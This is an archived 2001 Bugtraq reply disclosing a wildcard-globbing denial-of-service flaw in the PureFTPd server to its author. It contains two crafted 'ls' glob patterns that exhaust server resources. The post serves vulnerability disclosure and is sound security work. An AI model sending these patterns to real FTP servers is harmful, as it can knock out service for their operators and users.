[19671] in bugtraq
Re: Multiple vendors FTP denial of service
daemon@ATHENA.MIT.EDU (Jeff Dafoe)
Fri Mar 16 11:56:38 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Message-ID: <NDBBIOPEKLHMHCDKLPLPIEBHDLAA.jeffd@evcom.net>
Date: Thu, 15 Mar 2001 14:54:17 -0500
Reply-To: Jeff Dafoe <jeffd@EVCOM.NET>
From: Jeff Dafoe <jeffd@EVCOM.NET>
X-To: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20010315093409.A5565@synchron.home.rtchat.com>
> - PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
> expression to *" and the 'ls *' output.
In an ironic twist, PureFTPd (of which you are apparently the author), is
indeed vulnerable to this globbing bug, using variants of the string you
previously posted. Try:
ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/
and
ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
against your software. To give you the same level of notice you gave
everyone else, I went ahead and posted this into your bug tracking system
about 30 seconds ago.
Jeff
